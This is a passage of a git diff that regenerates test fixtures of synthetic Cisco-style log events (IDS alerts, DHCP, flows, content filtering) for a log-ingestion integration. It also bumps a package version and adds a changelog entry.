ids-alerts volupt ids-alerts signature=rem priority=idid timestamp=1502211015.tesse shost=01:00:5e:9d:eb:fb direction=external protocol=tcp src=10.247.139.239 dst=10.180.195.43 message: tenatuse", "event": { - "ingested": "2021-12-09T13:33:18.888565200Z" + "ingested": "2021-12-14T14:38:02.304907244Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tore 1503445970.elits consequa events dhcp release for mac 01:00:5e:50:48:c4", "event": { - "ingested": "2021-12-09T13:33:18.888570300Z" + "ingested": "2021-12-14T14:38:02.304907626Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "undeom uamnihi.risnis uov_ ids-alerts isn ids-alerts signature=sBono priority=loremqu timestamp=1504680924.teturprotocol=rdp src=10.94.6.140 dst=10.147.15.213message: uptat", "event": { - "ingested": "2021-12-09T13:33:18.888575500Z" + "ingested": "2021-12-14T14:38:02.304908022Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "itasper 1505915878.uae mve_ flows obeata flows block src=10.230.6.127 dst=10.111.157.56 mac=01:00:5e:39:a7:fc protocol=icmp type=aliquamq ", "event": { - "ingested": "2021-12-09T13:33:18.888580600Z" + "ingested": "2021-12-14T14:38:02.304908479Z" }, - "tags": [ + "ecs": { + "version": "1.12.0" + }, + "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "archite 1507150832.remq veniamq events aid=occ arp_resp=oloreseo arp_src=iruredol auth_neg_dur=veniamqu auth_neg_failed=licaboN channel=atquo dns_req_rtt=cupi dns_resp=strude dns_server=eritin duration=85.513000 full_conn=litsedq identity=nderiti ip_resp=ntNe ip_src=10.179.40.170 is_8021x=olorema is_wpa=mollita last_auth_ago=tatem radio=iae reason=quido rssi=emip type=inBC vap=mol client_mac=01:00:5e:58:2d:1c client_ip=10.153.81.206 instigator=rsita http_resp=nsequun dhcp_lease_completed=eetd dhcp_ip=illu dhcp_server=iatqu dhcp_server_mac=lorsi dhcp_resp=repreh url=https://www.example.net/irured/illumqui.txt?tionula=ritqu#ecatcupi category0=uamei server=10.193.219.34 vpn_type=onse connectivity=olorem", "event": { - "ingested": "2021-12-09T13:33:18.888585800Z" + "ingested": "2021-12-14T14:38:02.304908887Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "umwritte 1508385787.vol oremquel_appliance events MAC 01:00:5e:16:5e:b1 and MAC 01:00:5e:ee:e8:77 both claim IP: 10.255.199.16", "event": { - "ingested": "2021-12-09T13:33:18.888590900Z" + "ingested": "2021-12-14T14:38:02.304910929Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "unte 1509620741.uamnihil llam_appliance events MAC 01:00:5e:ee:1d:77 and MAC 01:00:5e:f1:21:bd both claim IP: 10.94.88.5", "event": { - "ingested": "2021-12-09T13:33:18.888596Z" + "ingested": "2021-12-14T14:38:02.304911441Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "esci 1510855695.uov quaeab_ events IDS: moles", "event": { - "ingested": "2021-12-09T13:33:18.888601100Z" + "ingested": "2021-12-14T14:38:02.304911850Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "accusa 1512090649.natu liquid events IDS: enim", "event": { - "ingested": "2021-12-09T13:33:18.888606300Z" + "ingested": "2021-12-14T14:38:02.304912241Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "dquiaco nibus.vitaed ser security_event etconsec signature=elillum priority=upt timestamp=1513325604.rnat dhost=01:00:5e:01:60:e0 direction=internal protocol=ipv6 src=10.90.99.245 dst=10.124.63.4 message:pta", "event": { - "ingested": "2021-12-09T13:33:18.888611500Z" + "ingested": "2021-12-14T14:38:02.304912625Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tetura 1514560558.imadmini moe_appliance events content_filtering_block url='https://mail.example.net/uat/lupta.html?uptassit=ncidi#tlabori' category0='laudan' server='10.249.7.146:2010'", "event": { - "ingested": "2021-12-09T13:33:18.888615500Z" + "ingested": "2021-12-14T14:38:02.304913013Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "lapar 1515795512.ritati edquia_appliance events IDS: itesse", "event": { - "ingested": "2021-12-09T13:33:18.888618600Z" + "ingested": "2021-12-14T14:38:02.304913531Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "amvolu mip.tion tobeatae_ security_event Utenima security_event iqua signature=luptat priority=deriti timestamp=1517030466.sintocc dhost=01:00:5e:c9:b7:22 direction=inbound protocol=icmp src=10.196.96.162 dst=10.81.234.34 message:equuntur", "event": { - "ingested": "2021-12-09T13:33:18.888622900Z" + "ingested": "2021-12-14T14:38:02.304913909Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "uide 1518265421.scivel henderi_appliance events IDS: iusmodt", "event": { - "ingested": "2021-12-09T13:33:18.888627600Z" + "ingested": "2021-12-14T14:38:02.304914287Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tiumd 1519500375.ntmoll mexer events dhcp lease of ip 10.40.101.224 from server mac 01:00:5e:0a:df:72 for client mac 01:00:5e:7c:01:ab with hostname remips188.api.invalid from router 10.78.199.43 on subnet ehender with dns ilmole", "event": { - "ingested": "2021-12-09T13:33:18.888632Z" + "ingested": "2021-12-14T14:38:02.304914662Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "runtmo 1520735329.ore isund_appliance events MAC 01:00:5e:17:87:3e and MAC 01:00:5e:5f:c1:3e both claim IP: 10.244.29.119", "event": { - "ingested": "2021-12-09T13:33:18.888635600Z" + "ingested": "2021-12-14T14:38:02.304915045Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tutlabor 1521970284.reseosq gna_ flows pteurs flows deny src=10.83.131.245 dst=10.39.172.93 mac=01:00:5e:c4:12:c7 protocol=udp type=uido ", "event": { - "ingested": "2021-12-09T13:33:18.888639700Z" + "ingested": "2021-12-14T14:38:02.304915427Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "osquira 1523205238.umd sciveli_ events dhcp lease of ip 10.86.188.179 from server mac 01:00:5e:48:4b:78 for client mac 01:00:5e:7e:cd:15 from router 10.201.168.116 on subnet umiure with dns laborum", "event": { - "ingested": "2021-12-09T13:33:18.888643600Z" + "ingested": "2021-12-14T14:38:02.304915812Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "umdolors 1524440192.lumdo acom_ security_event umexercisecurity_event duntut url=https://mail.example.com/prehend/eufug.htm?eufug=est#civelits src=10.148.211.222:2053 dst=10.122.204.151:3903 mac=01:00:5e:c3:a0:dc name=ine sha256=urerepre disposition=asnulap action=deny", "event": { - "ingested": "2021-12-09T13:33:18.888647200Z" + "ingested": "2021-12-14T14:38:02.304916197Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "atnul 1525675146.umfugi stquidol_ flows luptatem flows accept", "event": { - "ingested": "2021-12-09T13:33:18.888651300Z" + "ingested": "2021-12-14T14:38:02.304916603Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "essequam ueporro.aliqu upt ids-alerts signature=orum priority=Bonoru timestamp=1526910101.madminimprotocol=ipv6-icmp src=10.97.46.16 dst=10.120.4.9message: teni", "event": { - "ingested": "2021-12-09T13:33:18.888654800Z" + "ingested": "2021-12-14T14:38:02.304916996Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "lorsitam tanimid.onpr litseddo_ ids-alerts oremqu ids-alerts signature=idex priority=radip timestamp=1528145055.uptaprotocol=ipv6-icmp src=10.171.206.139 dst=10.165.173.162message: lestia", "event": { - "ingested": "2021-12-09T13:33:18.888659100Z" + "ingested": "2021-12-14T14:38:02.304917383Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inibusB 1529380009.nostrud cteturad events dhcp lease of ip 10.150.163.151 from server mac 01:00:5e:72:b7:79 for client mac 01:00:5e:f2:d3:12 with hostname uames4985.mail.localdomain from router 10.144.57.239 on subnet oinBCSed with dns orem", "event": { - "ingested": "2021-12-09T13:33:18.888664300Z" + "ingested": "2021-12-14T14:38:02.304917767Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "eritq rehen.ipsamvol elillum_ ids-alerts tco ids-alerts signature=tvol priority=oluptate timestamp=1530614963.lit shost=01:00:5e:ac:6d:d3 direction=unknown protocol=igmp src=10.52.202.158 dst=10.54.44.231 message: Ute", "event": { - "ingested": "2021-12-09T13:33:18.888669500Z" + "ingested": "2021-12-14T14:38:02.304918189Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "runtm 1531849918.eturadip olorsi_ events MAC 01:00:5e:67:1d:0f and MAC 01:00:5e:f0:a9:cd both claim IP: 10.101.183.86", "event": { - "ingested": "2021-12-09T13:33:18.888674700Z" + "ingested": "2021-12-14T14:38:02.304918580Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inesciu 1533084872.quid atcupid_ flows orem flows src=10.71.22.225 dst=10.4.76.100 protocol=ggp pattern: allow serrorsi", "event": { - "ingested": "2021-12-09T13:33:18.888679800Z" + "ingested": "2021-12-14T14:38:02.304918963Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "lamco 1534319826.cit siar events MAC 01:00:5e:80:cd:ca and MAC 01:00:5e:45:aa:51 both claim IP: 10.83.130.95", "event": { - "ingested": "2021-12-09T13:33:18.888685Z" + "ingested": "2021-12-14T14:38:02.304919350Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "hite 1535554780.ianonnum nofdeFi events aid=henderit arp_resp=remq arp_src=unt auth_neg_dur=tla auth_neg_failed=arch channel=lite dns_req_rtt=ugia dns_resp=meum dns_server=borumSec duration=91.439000 full_conn=nvolupta identity=tev ip_resp=nre ip_src=10.2.110.73 is_8021x=eturadip is_wpa=ent last_auth_ago=rumSecti radio=Utenima reason=olore rssi=orumS type=olor vap=radip client_mac=01:00:5e:59:bf:36 client_ip=10.230.98.81 instigator=aaliquaU http_resp=olu dhcp_lease_completed=iameaque dhcp_ip=identsun dhcp_server=ender dhcp_server_mac=inc dhcp_resp=tect url=https://www.example.net/doconse/eni.html?mSec=smoditem#tatisetq category0=uidolo server=10.103.49.129 vpn_type=oquisq connectivity=abori", "event": { - "ingested": "2021-12-09T13:33:18.888690100Z" + "ingested": "2021-12-14T14:38:02.304919728Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "dunt 1536789735.ames amni events aid=tatio arp_resp=amquisno arp_src=modoc auth_neg_dur=magnam auth_neg_failed=uinesc channel=cid dns_req_rtt=emi dns_resp=Bonorum dns_server=lesti duration=59.289000 full_conn=iosamni identity=idu ip_resp=sis ip_src=10.158.61.228 is_8021x=tsedquia is_wpa=its last_auth_ago=umdolor radio=isiu reason=assi rssi=eserun type=rvelill vap=lupta client_mac=01:00:5e:e6:a6:a2 client_ip=10.186.16.20 instigator=tisu http_resp=remagnam dhcp_lease_completed=nvolupt dhcp_ip=meiusm dhcp_server=nidolo dhcp_server_mac=atquovol dhcp_resp=quunt url=https://www.example.com/seq/moll.htm?sunt=dquianon#urExc category0=tDuis server=10.132.176.96 vpn_type=aria connectivity=inim", "event": { - "ingested": "2021-12-09T13:33:18.888695300Z" + "ingested": "2021-12-14T14:38:02.304920117Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "oremeumf 1538024689.lesti sintocca events dhcp lease of ip 10.105.136.146 from server mac 01:00:5e:bb:aa:f6 for client mac 01:00:5e:69:92:4a with hostname lors2232.api.example from router 10.46.217.155 on subnet amnihil with dns orissus", "event": { - "ingested": "2021-12-09T13:33:18.888700400Z" + "ingested": "2021-12-14T14:38:02.304920501Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "nimadmin 1539259643.lumqui quiavolu flows src=10.245.199.23 dst=10.123.62.215 mac=01:00:5e:1f:7f:1d protocol=udp pattern: 0 iusmodt", "event": { - "ingested": "2021-12-09T13:33:18.888705500Z" + "ingested": "2021-12-14T14:38:02.304920905Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "rep 1540494597.remap deri flows cancel src=10.239.105.121 dst=10.70.7.23 mac=01:00:5e:8e:82:f0 protocol=ipv6 ", "event": { - "ingested": "2021-12-09T13:33:18.888710600Z" + "ingested": "2021-12-14T14:38:02.304921287Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "idexeac 1541729552.nimadmin midest_appliance events aid=modt arp_resp=iduntutl arp_src=rsitam auth_neg_dur=xercit auth_neg_failed=ulpaquio channel=itqu dns_req_rtt=minimav dns_resp=smodtem dns_server=roquisqu duration=116.294000 full_conn=iquid identity=evo ip_resp=mcorpori ip_src=10.196.176.243 is_8021x=itesse is_wpa=expl last_auth_ago=essecill radio=totamre reason=rpo rssi=velites type=nonpro vap=nula client_mac=01:00:5e:99:a6:b4 client_ip=10.90.50.149 instigator=nemulla http_resp=asp dhcp_lease_completed=dexercit dhcp_ip=amn dhcp_server=itessequ dhcp_server_mac=porissu dhcp_resp=umd url=https://www.example.net/sectetur/edquian.html?turQuis=taevi#uames category0=tconsec server=10.16.230.121 vpn_type=laboree connectivity=udantiu", "event": { - "ingested": "2021-12-09T13:33:18.888715800Z" + "ingested": "2021-12-14T14:38:02.304921709Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ttenb olor.quiav gna security_event Nem signature=tdolorem priority=eacomm timestamp=1542964506.upidata dhost=01:00:5e:6a:c8:f8 direction=unknown protocol=ipv6 src=10.246.152.72:4293 dst=10.34.62.190:1641 message:eve", "event": { - "ingested": "2021-12-09T13:33:18.888721Z" + "ingested": "2021-12-14T14:38:02.304922082Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "quisn 1544199460.rem ulamcola events dhcp no offers for mac 01:00:5e:67:fc:cb", "event": { - "ingested": "2021-12-09T13:33:18.888726200Z" + "ingested": "2021-12-14T14:38:02.304922518Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "eruntmo 1545434414.nimve usanti_ events dhcp release for mac 01:00:5e:7d:de:f7", "event": { - "ingested": "2021-12-09T13:33:18.888731600Z" + "ingested": "2021-12-14T14:38:02.304923062Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "uatu 1546669369.olupta consequu_ events dhcp release for mac 01:00:5e:6b:96:f2", "event": { - "ingested": "2021-12-09T13:33:18.888736900Z" + "ingested": "2021-12-14T14:38:02.304923475Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "sitam inibusBo.illoin emUtenim ids-alerts signature=ende priority=dexea timestamp=1547904323.acoprotocol=ipv6 src=10.244.32.189 dst=10.121.9.5message: uptas", "event": { - "ingested": "2021-12-09T13:33:18.888742100Z" + "ingested": "2021-12-14T14:38:02.304923855Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "edol 1549139277.sequuntu quameius_ events content_filtering_block url='https://www.example.com/totamrem/aliqu.htm?sBonorum=moenimi#lor' category0='auto' server='10.41.124.15:333'", "event": { - "ingested": "2021-12-09T13:33:18.888747300Z" + "ingested": "2021-12-14T14:38:02.304924252Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "antium 1550374232.remaper eseosq events dhcp no offers for mac 01:00:5e:c3:77:27", "event": { - "ingested": "2021-12-09T13:33:18.888751200Z" + "ingested": "2021-12-14T14:38:02.304924636Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "oditau 1551609186.onsec dit events MAC 01:00:5e:19:86:21 and MAC 01:00:5e:ed:ed:79 both claim IP: 10.43.235.230", "event": { - "ingested": "2021-12-09T13:33:18.888755500Z" + "ingested": "2021-12-14T14:38:02.304925049Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "asper dictasun.psa lorese_ ids-alerts ctobeat ids-alerts signature=onsec priority=idestl timestamp=1552844140.litani shost=01:00:5e:a0:b2:c9 direction=unknown protocol=icmp src=10.199.19.205:5823 dst=10.103.91.159:7116 message: ntut", "event": { - "ingested": "2021-12-09T13:33:18.888760100Z" + "ingested": "2021-12-14T14:38:02.304925434Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "estiaec 1554079094.pitlabo tas_appliance flows src=10.17.111.91 dst=10.65.0.157 mac=01:00:5e:49:c4:17 protocol=udp pattern: 1 nostrum", "event": { - "ingested": "2021-12-09T13:33:18.888936800Z" + "ingested": "2021-12-14T14:38:02.304925820Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ercitati 1555314049.atem serro flows cancel", "event": { - "ingested": "2021-12-09T13:33:18.888940Z" + "ingested": "2021-12-14T14:38:02.304926200Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "amquaera 1556549003.rsitamet leumiur events MAC 01:00:5e:fd:79:9e and MAC 01:00:5e:4d:c0:dd both claim IP: 10.20.130.88", "event": { - "ingested": "2021-12-09T13:33:18.888945Z" + "ingested": "2021-12-14T14:38:02.304926605Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "abill ametcon.ofdeFini tasnu_ ids-alerts tionev ids-alerts signature=uasiarch priority=velites timestamp=1557783957.uredolorprotocol=ipv6 src=10.177.64.152 dst=10.140.242.86message: temporin", "event": { - "ingested": "2021-12-09T13:33:18.888949500Z" + "ingested": "2021-12-14T14:38:02.304927048Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "lor nvolupt.dquia ora_ security_event dipi security_event ecatc signature=quovolu priority=ite timestamp=1559018911.itse shost=01:00:5e:b8:73:c8 direction=external protocol=icmp src=10.199.103.185:2449 dst=10.51.121.223:24 message:stenat", "event": { - "ingested": "2021-12-09T13:33:18.888954Z" + "ingested": "2021-12-14T14:38:02.304927430Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "saq 1560253866.asiarch ssuscipi events MAC 01:00:5e:93:48:61 and MAC 01:00:5e:21:c2:55 both claim IP: 10.126.242.58", "event": { - "ingested": "2021-12-09T13:33:18.888957600Z" + "ingested": "2021-12-14T14:38:02.304927814Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tlab 1561488820.vel ionevo events dhcp release for mac 01:00:5e:8a:1a:f9", "event": { - "ingested": "2021-12-09T13:33:18.888962Z" + "ingested": "2021-12-14T14:38:02.304928196Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "aeab 1562723774.uradipis aerat_ flows uira flows deny src=10.121.37.244 dst=10.113.152.241 mac=01:00:5e:9c:86:62 protocol=udp type=utaliqui ", "event": { - "ingested": "2021-12-09T13:33:18.888966100Z" + "ingested": "2021-12-14T14:38:02.304928580Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "nesciu 1563958728.mali roinBCSe_appliance events aid=eetdolor arp_resp=tpersp arp_src=assi auth_neg_dur=rch auth_neg_failed=psa channel=nreprehe dns_req_rtt=pidatatn dns_resp=isno dns_server=luptatev duration=39.622000 full_conn=lla identity=urau ip_resp=aeca ip_src=10.247.118.132 is_8021x=atcupi is_wpa=enima last_auth_ago=uptateve radio=fugitsed reason=lumqui rssi=ectet type=ionu vap=eratv client_mac=01:00:5e:10:8b:c3 client_ip=10.153.33.99 instigator=liq http_resp=xerc dhcp_lease_completed=atisetqu dhcp_ip=squir dhcp_server=gnaaliq dhcp_server_mac=quam dhcp_resp=deriti url=https://www5.example.org/eturadi/umS.txt?mSecti=henderi#taevitae category0=tevel server=10.254.96.130 vpn_type=ita connectivity=iquipexe", "event": { - "ingested": "2021-12-09T13:33:18.888970500Z" + "ingested": "2021-12-14T14:38:02.304928970Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tot 1565193683.reme emeumfu events aid=inBCSedu arp_resp=ita arp_src=ade auth_neg_dur=nihilmol auth_neg_failed=nder channel=ano dns_req_rtt=rumexer dns_resp=eab dns_server=iaconseq duration=18.963000 full_conn=eli identity=rissusci ip_resp=ectetur ip_src=10.101.13.122 is_8021x=oconsequ is_wpa=roqui last_auth_ago=oluptate radio=ntut reason=mremaper rssi=uteirur type=ntium vap=ide client_mac=01:00:5e:95:ae:d0 client_ip=10.78.143.52 instigator=ntiumdol http_resp=conse dhcp_lease_completed=aturve dhcp_ip=edqui dhcp_server=tvolu dhcp_server_mac=psu dhcp_resp=strud url=https://internal.example.org/fdeFi/ratv.htm?sequatu=tiumtot#tate category0=udanti server=10.200.98.243 vpn_type=cteturad connectivity=umq", "event": { - "ingested": "2021-12-09T13:33:18.888976Z" + "ingested": "2021-12-14T14:38:02.304929351Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "oinvento 1566428637.mporin orissusc_appliance events content_filtering_block url='https://www5.example.net/uov/pariat.htm?litsed=lumd#tiaec' category0='lorem' server='10.247.205.185:7676' client_mac='01:00:5e:6f:21:c8'", "event": { - "ingested": "2021-12-09T13:33:18.888980700Z" + "ingested": "2021-12-14T14:38:02.304929739Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "metMa emoen.ptate mipsumqu_ ids-alerts ccusa ids-alerts signature=billo priority=doloremi timestamp=1567663591.ectetura dhost=01:00:5e:0a:88:bb direction=inbound protocol=ipv6 src=10.195.90.73:3914 dst=10.147.165.30:7662 message: idents", "event": { - "ingested": "2021-12-09T13:33:18.888983900Z" + "ingested": "2021-12-14T14:38:02.304930126Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "veniamqu 1568898545.iconsequ ueporr_appliance events IDS: empor", "event": { - "ingested": "2021-12-09T13:33:18.888988Z" + "ingested": "2021-12-14T14:38:02.304930522Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "atDuisa mipsa.uas iat ids-alerts signature=hite priority=adipis timestamp=1570133500.abo dhost=01:00:5e:dd:cb:5b direction=inbound protocol=udp src=10.137.166.97 dst=10.162.202.14 message: ipsaqua", "event": { - "ingested": "2021-12-09T13:33:18.888993200Z" + "ingested": "2021-12-14T14:38:02.304930916Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "deom 1571368454.tiumdo rautod_appliance events content_filtering_block url='https://www5.example.com/illoinve/etcon.htm?nevolup=erspici#itinvolu' category0='adeserun' server='10.227.135.142:6598'", "event": { - "ingested": "2021-12-09T13:33:18.888998300Z" + "ingested": "2021-12-14T14:38:02.304931326Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "orese 1572603408.umdolore umqui_appliance events MAC 01:00:5e:f1:b8:3a and MAC 01:00:5e:37:9c:af both claim IP: 10.199.29.19", "event": { - "ingested": "2021-12-09T13:33:18.889002Z" + "ingested": "2021-12-14T14:38:02.304931717Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "explicab 1573838362.samvolu teiru_appliance events dhcp no offers for mac 01:00:5e:b8:06:92", "event": { - "ingested": "2021-12-09T13:33:18.889006100Z" + "ingested": "2021-12-14T14:38:02.304932105Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "rissusci 1575073317.uaturQ iusmod_ events aid=mips arp_resp=iduntutl arp_src=mipsumd auth_neg_dur=eiusmo auth_neg_failed=quelauda channel=rcit dns_req_rtt=dolo dns_resp=ulamc dns_server=doe duration=10.574000 full_conn=remquela identity=toreve ip_resp=squirat ip_src=10.85.59.172 is_8021x=mto is_wpa=iae last_auth_ago=dent radio=Uten reason=tatiset rssi=sequat type=modoco vap=beataevi client_mac=01:00:5e:92:d8:95 client_ip=10.158.215.216 instigator=deritin http_resp=ptate dhcp_lease_completed=lloi dhcp_ip=nseq dhcp_server=equunt dhcp_server_mac=tutla dhcp_resp=usmod url=https://example.com/qui/itse.gif?orsitame=tasn#exeaco category0=upta server=10.75.122.111 vpn_type=reprehe connectivity=deFinib", "event": { - "ingested": "2021-12-09T13:33:18.889011200Z" + "ingested": "2021-12-14T14:38:02.304932498Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "orr 1576308271.pre aute events IDS: rchite", "event": { - "ingested": "2021-12-09T13:33:18.889015300Z" + "ingested": "2021-12-14T14:38:02.304932891Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" diff --git a/packages/cisco/manifest.yml b/packages/cisco/manifest.yml index 2ea35bb6595..486f9be6ad4 100644 --- a/packages/cisco/manifest.yml +++ b/packages/cisco/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: cisco title: Cisco -version: 0.12.4 +version: 0.12.5 license: basic description: Deprecated. Use a specific Cisco package instead. type: integration diff --git a/packages/cisco_asa/changelog.yml b/packages/cisco_asa/changelog.yml index 38d06dc133f..9268b015ed1 100644 --- a/packages/cisco_asa/changelog.yml +++ b/packages/cisco_asa/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.3.2" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.3.1" changes: - description: Change test public IPs to the supported subset diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-additional-messages.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-additional-messages.log-expected.json index 6e288f1f5ac..975e78e64c0 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-additional-messages.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-additional-messages.log-expected.json @@ -63,7 +63,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.615291700Z", + "ingested": "2021-12-14T14:38:14.656554271Z", "original": "May 5 17:51:17 dev01: %FTD-6-302013: Built inbound 